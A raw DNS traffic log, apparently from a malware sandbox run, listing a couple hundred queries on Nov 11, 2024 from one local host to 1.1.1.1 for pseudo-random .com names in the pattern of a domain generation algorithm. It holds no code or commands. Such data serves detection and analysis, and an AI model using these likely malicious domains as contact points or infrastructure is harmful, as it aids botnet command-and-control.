Nov 11, 2024 18:13:20.744477034 CET	192.168.2.6	1.1.1.1	0x8ec4	Standard query (0)	qedylig.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.750869989 CET	192.168.2.6	1.1.1.1	0xa88e	Standard query (0)	vofyzof.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.788187027 CET	192.168.2.6	1.1.1.1	0x3ae0	Standard query (0)	puvybuv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.797265053 CET	192.168.2.6	1.1.1.1	0x5d0c	Standard query (0)	lymymax.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.797411919 CET	192.168.2.6	1.1.1.1	0xf5c8	Standard query (0)	qeqyqep.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.804205894 CET	192.168.2.6	1.1.1.1	0x2bcd	Standard query (0)	vopykum.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.804536104 CET	192.168.2.6	1.1.1.1	0xafd	Standard query (0)	gadyzib.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.804744959 CET	192.168.2.6	1.1.1.1	0x7a7e	Standard query (0)	volydyk.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.804950953 CET	192.168.2.6	1.1.1.1	0x585f	Standard query (0)	qekysel.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.805144072 CET	192.168.2.6	1.1.1.1	0xf29b	Standard query (0)	galydyw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.805373907 CET	192.168.2.6	1.1.1.1	0xfb9b	Standard query (0)	lysylun.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.805681944 CET	192.168.2.6	1.1.1.1	0x3b3a	Standard query (0)	pupylug.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.807256937 CET	192.168.2.6	1.1.1.1	0xa87c	Standard query (0)	pumymap.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.807903051 CET	192.168.2.6	1.1.1.1	0x183	Standard query (0)	vonymoc.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.813240051 CET	192.168.2.6	1.1.1.1	0xbf4	Standard query (0)	puzyduq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.889525890 CET	192.168.2.6	1.1.1.1	0x47c8	Standard query (0)	lyvyver.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.890407085 CET	192.168.2.6	1.1.1.1	0x8c9c	Standard query (0)	gatyhos.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.893543959 CET	192.168.2.6	1.1.1.1	0xc70a	Standard query (0)	qetyhov.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.905255079 CET	192.168.2.6	1.1.1.1	0x37a2	Standard query (0)	lykytin.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.910523891 CET	192.168.2.6	1.1.1.1	0x96e2	Standard query (0)	vopyjac.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.921456099 CET	192.168.2.6	1.1.1.1	0x22cf	Standard query (0)	ganyvyw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.929848909 CET	192.168.2.6	1.1.1.1	0x8c39	Standard query (0)	pupyjap.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.930428028 CET	192.168.2.6	1.1.1.1	0x8c6	Standard query (0)	qekytig.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.930629969 CET	192.168.2.6	1.1.1.1	0xc829	Standard query (0)	vonybuk.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.948175907 CET	192.168.2.6	1.1.1.1	0xb4db	Standard query (0)	gaqyhaw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.948508978 CET	192.168.2.6	1.1.1.1	0xe3e8	Standard query (0)	purymog.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.948879004 CET	192.168.2.6	1.1.1.1	0x9603	Standard query (0)	volycem.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.949192047 CET	192.168.2.6	1.1.1.1	0x41cd	Standard query (0)	pupywyv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.951766014 CET	192.168.2.6	1.1.1.1	0x7e38	Standard query (0)	lymygor.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.953075886 CET	192.168.2.6	1.1.1.1	0x9163	Standard query (0)	puzyceg.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.957689047 CET	192.168.2.6	1.1.1.1	0x7a54	Standard query (0)	vojyzik.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.960712910 CET	192.168.2.6	1.1.1.1	0x41e7	Standard query (0)	vopyqef.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.960964918 CET	192.168.2.6	1.1.1.1	0x33eb	Standard query (0)	qebyfup.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.961837053 CET	192.168.2.6	1.1.1.1	0x24bd	Standard query (0)	qebyvyl.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.962039948 CET	192.168.2.6	1.1.1.1	0x94ea	Standard query (0)	lygylur.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.962532043 CET	192.168.2.6	1.1.1.1	0x8220	Standard query (0)	vofyruc.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.962676048 CET	192.168.2.6	1.1.1.1	0x660c	Standard query (0)	qekyxaq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.962783098 CET	192.168.2.6	1.1.1.1	0xe359	Standard query (0)	galycah.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.964416981 CET	192.168.2.6	1.1.1.1	0xae51	Standard query (0)	qedyruv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.964509964 CET	192.168.2.6	1.1.1.1	0x2029	Standard query (0)	gahyziw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.965769053 CET	192.168.2.6	1.1.1.1	0xdd5a	Standard query (0)	ganyfuz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:20.965780020 CET	192.168.2.6	1.1.1.1	0x882c	Standard query (0)	puvydyp.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.002361059 CET	192.168.2.6	1.1.1.1	0x58a9	Standard query (0)	qexyvyg.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.002563953 CET	192.168.2.6	1.1.1.1	0xfe7d	Standard query (0)	lygytix.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.002563953 CET	192.168.2.6	1.1.1.1	0x38f2	Standard query (0)	gacyvub.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.002757072 CET	192.168.2.6	1.1.1.1	0x8255	Standard query (0)	gadykyz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.002969980 CET	192.168.2.6	1.1.1.1	0xc131	Standard query (0)	pufytip.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.003344059 CET	192.168.2.6	1.1.1.1	0x8c89	Standard query (0)	lyvyfux.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.003500938 CET	192.168.2.6	1.1.1.1	0x35e8	Standard query (0)	qexysev.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.003724098 CET	192.168.2.6	1.1.1.1	0x225f	Standard query (0)	qegylul.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.009572029 CET	192.168.2.6	1.1.1.1	0xbf07	Standard query (0)	lysyjex.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.009937048 CET	192.168.2.6	1.1.1.1	0xfb93	Standard query (0)	pujyxoq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.012578011 CET	192.168.2.6	1.1.1.1	0xd2ca	Standard query (0)	vowyjak.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.020531893 CET	192.168.2.6	1.1.1.1	0xd2ba	Standard query (0)	lyryman.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.023224115 CET	192.168.2.6	1.1.1.1	0x5cf2	Standard query (0)	pumygil.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.023526907 CET	192.168.2.6	1.1.1.1	0xa867	Standard query (0)	vocydyc.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.027985096 CET	192.168.2.6	1.1.1.1	0xebd	Standard query (0)	pujytug.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.029439926 CET	192.168.2.6	1.1.1.1	0xe29b	Standard query (0)	gacydes.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.029668093 CET	192.168.2.6	1.1.1.1	0x1295	Standard query (0)	vowymom.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.029814959 CET	192.168.2.6	1.1.1.1	0x9c4b	Standard query (0)	puzypav.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.030004025 CET	192.168.2.6	1.1.1.1	0x1e2e	Standard query (0)	lymynuj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.030148983 CET	192.168.2.6	1.1.1.1	0xa5c4	Standard query (0)	gaqynih.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.030379057 CET	192.168.2.6	1.1.1.1	0x5546	Standard query (0)	volypof.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.030690908 CET	192.168.2.6	1.1.1.1	0xfb88	Standard query (0)	vonygit.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.031240940 CET	192.168.2.6	1.1.1.1	0xbf22	Standard query (0)	qetyqag.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.031806946 CET	192.168.2.6	1.1.1.1	0x7c14	Standard query (0)	gadyrus.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.031965971 CET	192.168.2.6	1.1.1.1	0x3584	Standard query (0)	gatyqeb.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.032188892 CET	192.168.2.6	1.1.1.1	0xcfea	Standard query (0)	lyxysad.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.032354116 CET	192.168.2.6	1.1.1.1	0x817c	Standard query (0)	vofykyt.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.032527924 CET	192.168.2.6	1.1.1.1	0x70	Standard query (0)	qeqyhol.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.035186052 CET	192.168.2.6	1.1.1.1	0xc9c7	Standard query (0)	pumybuq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.038525105 CET	192.168.2.6	1.1.1.1	0xc731	Standard query (0)	qedykep.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.044856071 CET	192.168.2.6	1.1.1.1	0x1c13	Standard query (0)	lykyxoj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.055917025 CET	192.168.2.6	1.1.1.1	0x23cd	Standard query (0)	lyxyvyn.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.056135893 CET	192.168.2.6	1.1.1.1	0xa20e	Standard query (0)	pufylul.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.056303024 CET	192.168.2.6	1.1.1.1	0x9764	Standard query (0)	lysywyd.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.056463957 CET	192.168.2.6	1.1.1.1	0x1e21	Standard query (0)	qeqyniq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.059804916 CET	192.168.2.6	1.1.1.1	0x9d93	Standard query (0)	galypob.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.195087910 CET	192.168.2.6	1.1.1.1	0xd832	Standard query (0)	vojyrum.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.583712101 CET	192.168.2.6	1.1.1.1	0x5bd3	Standard query (0)	gahyruh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.583712101 CET	192.168.2.6	1.1.1.1	0x84fc	Standard query (0)	qegyryq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.584115982 CET	192.168.2.6	1.1.1.1	0xfce7	Standard query (0)	lyrygid.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.584563971 CET	192.168.2.6	1.1.1.1	0x6061	Standard query (0)	vocycat.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.584760904 CET	192.168.2.6	1.1.1.1	0xa96	Standard query (0)	purygiv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.587456942 CET	192.168.2.6	1.1.1.1	0xe1	Standard query (0)	lysymor.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.587940931 CET	192.168.2.6	1.1.1.1	0x222	Standard query (0)	pupyguq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.590060949 CET	192.168.2.6	1.1.1.1	0x7033	Standard query (0)	qekyryp.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.590305090 CET	192.168.2.6	1.1.1.1	0x5244	Standard query (0)	gatyniz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.591211081 CET	192.168.2.6	1.1.1.1	0x7f7e	Standard query (0)	puvycel.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.591552019 CET	192.168.2.6	1.1.1.1	0xe600	Standard query (0)	purybup.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.592992067 CET	192.168.2.6	1.1.1.1	0x90ce	Standard query (0)	lygyjan.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.594093084 CET	192.168.2.6	1.1.1.1	0x39bd	Standard query (0)	qexytil.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.594435930 CET	192.168.2.6	1.1.1.1	0x8a9d	Standard query (0)	gaqyvys.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.602880955 CET	192.168.2.6	1.1.1.1	0x7189	Standard query (0)	vonydem.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.603180885 CET	192.168.2.6	1.1.1.1	0x16bb	Standard query (0)	lykywex.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.603708029 CET	192.168.2.6	1.1.1.1	0xe57a	Standard query (0)	galyzus.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.605830908 CET	192.168.2.6	1.1.1.1	0x369b	Standard query (0)	ganycob.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.606168985 CET	192.168.2.6	1.1.1.1	0xd7b8	Standard query (0)	qeqyvev.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.606899977 CET	192.168.2.6	1.1.1.1	0x4786	Standard query (0)	vofyjom.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.607405901 CET	192.168.2.6	1.1.1.1	0x4605	Standard query (0)	lyxytur.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.607609034 CET	192.168.2.6	1.1.1.1	0xd8e1	Standard query (0)	pufyjag.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.608468056 CET	192.168.2.6	1.1.1.1	0x4065	Standard query (0)	vowybyc.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.624166965 CET	192.168.2.6	1.1.1.1	0xd36a	Standard query (0)	vocypok.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.624166965 CET	192.168.2.6	1.1.1.1	0xe825	Standard query (0)	qegykeg.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.625750065 CET	192.168.2.6	1.1.1.1	0x632f	Standard query (0)	lyrynux.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.708101034 CET	192.168.2.6	1.1.1.1	0xb42d	Standard query (0)	ganydeh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.708466053 CET	192.168.2.6	1.1.1.1	0xc37	Standard query (0)	gadyhoh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.708748102 CET	192.168.2.6	1.1.1.1	0xefb7	Standard query (0)	qebysaq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.709260941 CET	192.168.2.6	1.1.1.1	0x7f6	Standard query (0)	puzytul.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.709593058 CET	192.168.2.6	1.1.1.1	0xd05	Standard query (0)	vopymit.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.709892988 CET	192.168.2.6	1.1.1.1	0x548b	Standard query (0)	qexyxop.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.728848934 CET	192.168.2.6	1.1.1.1	0x6ed3	Standard query (0)	lygywyj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.728883028 CET	192.168.2.6	1.1.1.1	0x473a	Standard query (0)	pupymol.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.729223013 CET	192.168.2.6	1.1.1.1	0xc881	Standard query (0)	gahykeb.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.729800940 CET	192.168.2.6	1.1.1.1	0xeeb4	Standard query (0)	volyzic.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.729965925 CET	192.168.2.6	1.1.1.1	0xf6ae	Standard query (0)	lymyfyn.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.730021954 CET	192.168.2.6	1.1.1.1	0xab72	Standard query (0)	gacypiw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.730314016 CET	192.168.2.6	1.1.1.1	0xc60f	Standard query (0)	qeqyfug.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.730967045 CET	192.168.2.6	1.1.1.1	0xe245	Standard query (0)	gacycaz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.738528967 CET	192.168.2.6	1.1.1.1	0x8bc3	Standard query (0)	vofyqek.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.740489960 CET	192.168.2.6	1.1.1.1	0x20e0	Standard query (0)	pumydyg.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.740731001 CET	192.168.2.6	1.1.1.1	0x67c0	Standard query (0)	qekyluv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.740778923 CET	192.168.2.6	1.1.1.1	0x99d5	Standard query (0)	pufyweq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.741097927 CET	192.168.2.6	1.1.1.1	0xc56e	Standard query (0)	vopyguk.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.746057987 CET	192.168.2.6	1.1.1.1	0x3ae7	Standard query (0)	pujylyv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.746234894 CET	192.168.2.6	1.1.1.1	0x16be	Standard query (0)	qetynup.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.746397018 CET	192.168.2.6	1.1.1.1	0x6ff2	Standard query (0)	volyrut.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.746539116 CET	192.168.2.6	1.1.1.1	0x8bf9	Standard query (0)	lymyved.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.747323990 CET	192.168.2.6	1.1.1.1	0xc6da	Standard query (0)	qedyhiq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.747936010 CET	192.168.2.6	1.1.1.1	0x7aca	Standard query (0)	lyvysaj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.749114037 CET	192.168.2.6	1.1.1.1	0xd5bd	Standard query (0)	puvypoq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.749296904 CET	192.168.2.6	1.1.1.1	0xb52b	Standard query (0)	vowyguf.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.749669075 CET	192.168.2.6	1.1.1.1	0x7303	Standard query (0)	vojykyf.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.749849081 CET	192.168.2.6	1.1.1.1	0x5bd7	Standard query (0)	lykylud.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.749999046 CET	192.168.2.6	1.1.1.1	0x2ee2	Standard query (0)	vonycaf.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.750540018 CET	192.168.2.6	1.1.1.1	0xb88	Standard query (0)	lysygij.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.752296925 CET	192.168.2.6	1.1.1.1	0x8924	Standard query (0)	pumycav.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.752521992 CET	192.168.2.6	1.1.1.1	0xd04b	Standard query (0)	gaqyfub.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.752902985 CET	192.168.2.6	1.1.1.1	0x8256	Standard query (0)	galyryz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.778534889 CET	192.168.2.6	1.1.1.1	0xba88	Standard query (0)	qedyqal.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.778919935 CET	192.168.2.6	1.1.1.1	0x9ecc	Standard query (0)	puzyxip.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.801300049 CET	192.168.2.6	1.1.1.1	0x791e	Standard query (0)	lyxyxox.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:21.832101107 CET	192.168.2.6	1.1.1.1	0x31f2	Standard query (0)	gadyqaw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.433587074 CET	192.168.2.6	1.1.1.1	0x132	Standard query (0)	lysyfed.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.435877085 CET	192.168.2.6	1.1.1.1	0x24b3	Standard query (0)	pumyxul.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.436326981 CET	192.168.2.6	1.1.1.1	0xdab7	Standard query (0)	lymyxir.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.436570883 CET	192.168.2.6	1.1.1.1	0x6fe8	Standard query (0)	galyqoh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.450772047 CET	192.168.2.6	1.1.1.1	0xc36	Standard query (0)	lyxywen.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.457640886 CET	192.168.2.6	1.1.1.1	0x4a33	Standard query (0)	gaqycow.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.465400934 CET	192.168.2.6	1.1.1.1	0x5374	Standard query (0)	volyqam.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.468794107 CET	192.168.2.6	1.1.1.1	0x8661	Standard query (0)	vowycok.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.468982935 CET	192.168.2.6	1.1.1.1	0xdf4b	Standard query (0)	vojyjot.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.494199991 CET	192.168.2.6	1.1.1.1	0x640f	Standard query (0)	qedynug.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.494453907 CET	192.168.2.6	1.1.1.1	0xa6dc	Standard query (0)	qebytuv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.500756025 CET	192.168.2.6	1.1.1.1	0x4ec8	Standard query (0)	lysynun.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.501085997 CET	192.168.2.6	1.1.1.1	0x29f4	Standard query (0)	vonypic.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.502243042 CET	192.168.2.6	1.1.1.1	0xd4ef	Standard query (0)	pufymiv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.502454042 CET	192.168.2.6	1.1.1.1	0x97e9	Standard query (0)	lymysox.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.502543926 CET	192.168.2.6	1.1.1.1	0xded0	Standard query (0)	pupybyg.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.502717018 CET	192.168.2.6	1.1.1.1	0x19bc	Standard query (0)	puzywag.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.502875090 CET	192.168.2.6	1.1.1.1	0x24cd	Standard query (0)	qexyluq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.503802061 CET	192.168.2.6	1.1.1.1	0x8905	Standard query (0)	qeqyxil.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.504542112 CET	192.168.2.6	1.1.1.1	0x3508	Standard query (0)	pumypop.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.506608009 CET	192.168.2.6	1.1.1.1	0x95ec	Standard query (0)	pujyjol.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.506881952 CET	192.168.2.6	1.1.1.1	0x59c	Standard query (0)	qekykal.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.508018970 CET	192.168.2.6	1.1.1.1	0xc6cf	Standard query (0)	lykyjar.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.508513927 CET	192.168.2.6	1.1.1.1	0x7211	Standard query (0)	lyryfyr.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.511255026 CET	192.168.2.6	1.1.1.1	0xa376	Standard query (0)	gacyzuh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.511492968 CET	192.168.2.6	1.1.1.1	0x8300	Standard query (0)	galykew.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.529447079 CET	192.168.2.6	1.1.1.1	0x6f07	Standard query (0)	vofyguc.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.530822039 CET	192.168.2.6	1.1.1.1	0xcd9c	Standard query (0)	pufygup.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.531542063 CET	192.168.2.6	1.1.1.1	0x9d0d	Standard query (0)	vowydet.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.531739950 CET	192.168.2.6	1.1.1.1	0xa917	Standard query (0)	vojyqac.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.532213926 CET	192.168.2.6	1.1.1.1	0x5c43	Standard query (0)	lyvyxin.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.532491922 CET	192.168.2.6	1.1.1.1	0x3696	Standard query (0)	vocyryf.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.532759905 CET	192.168.2.6	1.1.1.1	0xa880	Standard query (0)	lyryvaj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.532938957 CET	192.168.2.6	1.1.1.1	0x6275	Standard query (0)	gahyhiz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.533329964 CET	192.168.2.6	1.1.1.1	0x6e74	Standard query (0)	qegyhip.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.535325050 CET	192.168.2.6	1.1.1.1	0xb36e	Standard query (0)	gadyfys.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.541431904 CET	192.168.2.6	1.1.1.1	0x753e	Standard query (0)	qetyveq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.541654110 CET	192.168.2.6	1.1.1.1	0xa485	Standard query (0)	gahyqas.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.541842937 CET	192.168.2.6	1.1.1.1	0x28cf	Standard query (0)	qebyxog.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.542002916 CET	192.168.2.6	1.1.1.1	0xed81	Standard query (0)	vopybym.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.542151928 CET	192.168.2.6	1.1.1.1	0x52e8	Standard query (0)	gatyfuw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.542531013 CET	192.168.2.6	1.1.1.1	0x2cc8	Standard query (0)	lyvytud.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.542678118 CET	192.168.2.6	1.1.1.1	0x401e	Standard query (0)	gatyveh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.542809963 CET	192.168.2.6	1.1.1.1	0xacd7	Standard query (0)	vocyzum.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.543843031 CET	192.168.2.6	1.1.1.1	0xcc1f	Standard query (0)	lygygux.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.543934107 CET	192.168.2.6	1.1.1.1	0xacb7	Standard query (0)	pujywep.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:22.544044971 CET	192.168.2.6	1.1.1.1	0x1adc	Standard query (0)	ganypis.com	A (IP address)	IN (0x0001)	false
